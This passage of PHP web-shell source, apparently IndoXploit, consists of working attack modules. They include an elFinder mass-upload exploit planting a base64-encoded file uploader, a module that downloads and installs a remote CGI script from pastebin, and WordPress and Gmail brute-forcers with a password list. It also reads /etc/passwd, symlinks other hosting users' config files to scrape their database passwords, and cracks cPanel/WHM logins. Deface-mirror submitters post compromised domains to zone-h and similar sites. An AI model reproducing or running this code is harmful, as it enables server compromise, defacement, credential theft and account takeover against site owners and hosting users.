$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "','"')."\n";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
} elseif(preg_match("/client/", $ambil)) {
preg_match("/password=(.*)/", $ambil, $pass1);
if(preg_match('/"/', $pass1[1])) {
$pass1[1] = str_replace('"', "", $pass1[1]);
$pass .= $pass1[1]."\n";
}
} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
$pass .= ambilkata($ambil,"db_password = '","'")."\n";
}
}
echo $pass;
}
$cp_pass = cp_pass($dir);
echo $cp_pass;
echo "</textarea><br>
<input type='submit' name='crack' style='width: 450px;' value='Crack'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
}}
elseif($_GET['do'] == 'elfinder') {
echo '<center>
<form method="post">
Target: <br>
<textarea name="target" placeholder="http://www.target.com/_filemanager/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
<input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
</form>
';
# IndoXploit
function ngirim($url, $isi) {
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);
return $data3;
}
$target = explode("\r\n", $_POST['target']);
if($_POST['x']) {
foreach($target as $korban) {
$nama_doang = "k.php";
$isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
$decode_isi = base64_decode($isi_nama_doang);
$encode = base64_encode($nama_doang);
$fp = fopen($nama_doang,"w");
fputs($fp, $decode_isi);
echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
echo "# Upload[1] ......<br>";
$url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
$b = file_get_contents("$url_mkfile");
$post1 = array(
"cmd" => "put",
"target" => "l1_$encode",
"content" => "$decode_isi",
);
$post2 = array(
"current" => "8ea8853cb93f2f9781e0bf6e857015ea",
"upload[]" => "@$nama_doang",);
$output_mkfile = ngirim("$korban", $post1);
if(preg_match("/$nama_doang/", $output_mkfile)) {
echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
} else {
echo "# Upload Failed 1 <br># Uploading 2..<br>";
$upload_ah = ngirim("$korban?cmd=upload", $post2);
if(preg_match("/$nama_doang/", $upload_ah)) {
echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
} else {
echo "# Upload Failed 2<br><br>";
echo '</center>';
}
}
}
}
}
elseif($_GET['do'] == 'mirorsubmit') {
echo "<center>
<form method='post'>
Hacker Name : <input type='text' name='defacer' size='32' style='border: solid 1px red'>   Mirror :
<select style='border: solid 1px red' name='mirror'>
<option>zone-h</option>
<option>dark-h</option>
<option>aljyyosh.org</option>
</select><br>
Domains :<br><textarea style='width: 678px; height: 302px;border: solid 1px red' name='domains'></textarea><br>
<input type='submit' value='Send' name='go'>
</form>";
set_time_limit (0);
if (!function_exists ("curl_init")){die ("This Script uses cURL Library, you must install first !<br><a href='http://au2.php.net/manual/en/curl.setup.php'>http://au2.php.net/manual/en/curl.setup.php</a>");}
if (@$_POST['go'])
{
foreach (explode ("\n", $_POST['domains']) as $domain)
{
post ($domain, $_POST['defacer'], $_POST['mirror']);
}
echo "<br><br><a target='_blank' href='http://zone-h.com/archive/published=0'>Zone-h</a><br>";
echo "<a target='_blank' href='http://dark-h.org/onhold/?s=1'>Dark-h</a><br>";
echo "<a target='_blank' href='http://aljyyosh.org/onhold.php'>Aljyyosh.org</a>";
}
function post ($url, $defacer, $mirror)
{
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
switch ($mirror)
{
case "zone-h";
curl_setopt ($ch, CURLOPT_URL, "http://www.zone-h.com/notify/single");
curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&hackmode=1&reason=1");
if (preg_match ("/color=\"red\">OK<\/font><\/li>/", curl_exec ($ch)))
echo "$url.      <span style='color: green'>OK</span><br>";
else
echo "$url      <span style='color: red'>Error</span><br>";
break;
case "dark-h";
curl_setopt ($ch, CURLOPT_URL, "http://dark-h.org/notify/kaydet.php");
curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&gkodumuz=123456&zgkod=123456&kod=123456");
curl_exec ($ch);
echo "$url<br>";
break;
case "aljyyosh.org";
curl_setopt ($ch, CURLOPT_URL, "http://aljyyosh.org/single.php");
curl_setopt ($ch, CURLOPT_COOKIE, "alj=aljyyosh");
curl_setopt ($ch, CURLOPT_POSTFIELDS, "hacker=$defacer&site=$url&how=1&why=1&addsite=Send");
if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($ch)))
echo "$url      <span style='color: green'>OK</span><br>";
else
echo "$url      <span style='color: red'>Error</span><br>";
break;
default:
break;
}
curl_close ($ch);
}
}
elseif($_GET['do'] == 'zoneh') {
if($_POST['submit']) {
$domain = explode("\r\n", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
function zoneh($url,$nick) {
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
return curl_exec($ch);
curl_close($ch);
}
foreach($domain as $url) {
$zoneh = zoneh($url,$nick);
if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
echo "$url -> <font color=lime>OK</font><br>";
} else {
echo "$url -> <font color=red>ERROR</font><br>";
}
}
} else {
echo "<center><form method='post'>
<u>Defacer</u>: <br>
<input type='text' name='nick' size='50' value='mr Z'><br>
<u>Domains</u>: <br>
<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
<input type='submit' name='submit' value='Submit' style='width: 450px;'>
</form>";
}
echo "</center>";
} elseif($_GET['do'] == 'cgi') {
$cgi_dir = mkdir('ctt_cgi', 0755);
$file_cgi = "ctt_cgi/cgi.izo";
$isi_htcgi = "AddHandler cgi-script .izo";
$htcgi = fopen(".htaccess", "w");
$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
$cgi = fopen($file_cgi, "w");
fwrite($cgi, $cgi_script);
fwrite($htcgi, $isi_htcgi);
chmod($file_cgi, 0755);
echo "<iframe src='ctt_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
} elseif($_GET['do'] == 'fake_root') {
ob_start();
function reverse($url) {
$ch = curl_init("http://domains.yougetsignal.com/domains.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
$resp = curl_exec($ch);
$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
$array = explode(",,", $resp);
unset($array[0]);
foreach($array as $lnk) {
$lnk = "http://$lnk";
$lnk = str_replace(",", "", $lnk);
echo $lnk."\n";
ob_flush();
flush();
}
curl_close($ch);
}
function cek($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$resp = curl_exec($ch);
return $resp;
}
$cwd = getcwd();
$ambil_user = explode("/", $cwd);
$user = $ambil_user[2];
if($_POST['reverse']) {
$site = explode("\r\n", $_POST['url']);
$file = $_POST['file'];
foreach($site as $url) {
$cek = cek("$url/~$user/$file");
if(preg_match("/hacked/i", $cek)) {
echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
}
}
} else {
echo "<center><form method='post'>
Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
Domain: <br>
<textarea style='width: 450px; height: 250px;' name='url'>";
reverse($_SERVER['HTTP_HOST']);
echo "</textarea><br>
<input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
</form><br>
NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
}
}
elseif($_GET['do'] == 'wpbf') {
echo '<html />
<meta name="author" content="Th3 K!LL3r Dz" />
<meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
<meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
<title># Wordpress Mass brute Force #</title>
</head>
</br></br>
<center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
<form method="post" action="" enctype="multipart/form-data">
<table width="50%" border="0">
<tr><td><p ><font class="d1">User :</font>
<input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
</td></tr>
<tr><td><font class="d1">Sites list :</font>
</td><td><font class="d1" >Pass list :</font></td></tr>
<tr><td>
<textarea name="sites" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" cols="20" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin1
admin12
admin123
demo
nimda
user
garuda
admins
admin1
superuser
superadmin
mradmin
users
adminweb
@dmin
@dmins
@dmin123
4dmin
4dm1n
4dmin123
nimda123
admin2017
admin2016
admin2015
administrator
admin_2015
admin_2016
admin_2017
master
masterweb
ani
ana
asti
astrid
andre
andin
anderson
ardi
budi
beni
bento
baron
brian
bravo
123123
Abcdefg
retset
741852
</textarea>
</td></tr><tr><td>
<font >
<input type="submit" name="x" value="start" id="d4">
</font></td></tr></table>
</form></center>';
@set_time_limit(0);
if($_POST['x']){
echo "<hr>";
$sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz !
$w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz !
$Attack = new Wordpress_brute_Force(); // Active Class
foreach($w0rds as $pwd){
foreach($sites as $site){
$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}
}
}
# Class & Function'z
function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
class Wordpress_brute_Force{
public function check_it($site,$user,$pass){ // print result
if(eregi('profile.php',$this->post($site,$user,$pass))){
echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
$f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
}
public function post($site,$user,$pass){ // Post -> user & pass
$login =$site.'/wp-login.php';
$to = $site.'/wp-admin';
$token = $this->extract_token($site);
$log = array ('Log In','دخول');
$data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$login);
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
public function extract_token($site){ // get token from source for -> function post
$source = $this->get_source($site);
preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
return $token[1][0];
}
public function get_source($site){ // get source for -> function extract_token
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$login);
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
} }elseif($_GET['do'] == 'whmcs') {
$dic ="list.txt";
///////////////////////
echo "
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='list.txt' /> - <input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
</table>
<center>sebelum gunain tools ini upload dulu file list.txt ente</center>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}}
////////////////////////////////////////////////
elseif($_GET['do'] == 'finder') {
$head = '
<html>
<head>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>'; ?>
<html>
<head>
<?php
echo $head ;
echo '<center><b>mass symlink with cpanel/whm crack</b></center>
';
?>
<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
<form method=post>
<input type=submit name=ini value="Generate PHP.ini" /></form>
<?php
if(isset($_POST['ini']))
{
$r=fopen('php.ini','w');
$rr=" disable_functions=none ";
fwrite($r,$rr);
$link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
echo $link;
}
?>
<p>mass symlink
<?php
//////////////////////////////////////
///// mass symlink ////////
//////////////////////////////////////
?>
<form method=post>
<input type=submit name="usre" value="click to Extract usernames and mass symlink" /></form>
<?php
if(isset($_POST['usre'])){
?><form method=post>
<textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<input type=submit name=su value="hajar" /></form>
<?php } ?>
<?php
error_reporting(0);
echo "<font color=red size=2 face=\"comic sans ms\">";
if(isset($_POST['su']))
{
$dir=mkdir('ctt_config',0777);
$r = " Options all \n DirectoryIndex ICA.html \n Require None \n Satisfy Any";
$f = fopen('ctt_config/.htaccess','w');
fwrite($f,$r);
$consym="<a href=ctt_config/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
$usr=explode("\n",$_POST['user']);
foreach($usr as $uss )
{
$us=trim($uss);
$r="ctt_config/";
symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
}
}
?>
<?php
//////////////////////////////////////
/////password grabbing section////////
//////////////////////////////////////
?>
<form method=post>
<input type=submit name=sm value="start grabbing passwords from configuration files"></form>
<?php
error_reporting(0);
set_time_limit(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}
if(isset($_POST['sm']))
{
echo "gagal ikeh adek bang";
$ffile=fopen('r.txt','a+');
$r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/ctt_config/";
$re=$r;
$confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
$usersss=$str[0];
foreach($confi as $co)
{
$uurl=$re.$usersss.$co;
$uel=$uurl;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uel);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
$uxl=$result['EXE'];
if($uxl && preg_match('/table_prefix/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
if(!empty($dbp))
$pass=$dbp."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
echo $dbp=entre2v2($uxl,"db_password = '","';");
if(!empty($dbp))
$pass=$dbp."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbprefix/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
echo $db=entre2v2($uxl,"password = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/admincpdir/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
echo $db=entre2v2($uxl,"password'] = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbpass/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
echo $db=entre2v2($uxl,"dbpass = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbpass/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
echo $db=entre2v2($uxl,"dbpass = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbpass/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
echo $db=entre2v2($uxl,"dbpass = \"","\";");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
}
}
}
?>
<?php
/////////////////////////////////
///// cpanel cracker ///////
/////////////////////////////////
?>
<form method=post>
<input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
<?php
if(isset($_POST['cpanel']))
{
?>
<form method=post><div align=center><table>
want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
<option name="op" value="whm">WHMPanel</option></table><p>
<textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
<?php
$d=getcwd()."/r.txt";
$pf=file($d);
foreach($pf as $rt)
{
$str=explode('\n',$rt);
echo trim($str[0])."\n";
} ?></textarea><p>
<input type=submit name=cpanelcracking value="hajar mbah >.<"></form>
<?php
}
?>
<?php
error_reporting(0);
$connect_timeout=5;
set_time_limit(0);
$userl=$_POST['usernames'];
$passl=$_POST['passwords'];
$attack=$_POST['op'];
$target = "localhost";
if(isset($_POST['cpanelcracking']))
{
if($userl!=="" && $passl!=="")
{
if($_POST["op"]=="cp")
{
$cracked=$_POST['crack'];
@fopen($cracked,'a');
echo "sukses nyolong cpanel bang. \n";
}
elseif($_POST["op"]=="whm")
{
@fopen($cracked,'a');
echo "sukses nyolong whm bang.";
}
function cpanel($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
}
curl_close($ch);}
$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);
if ($attack == "cp")
{
foreach ($userlist as $user) {
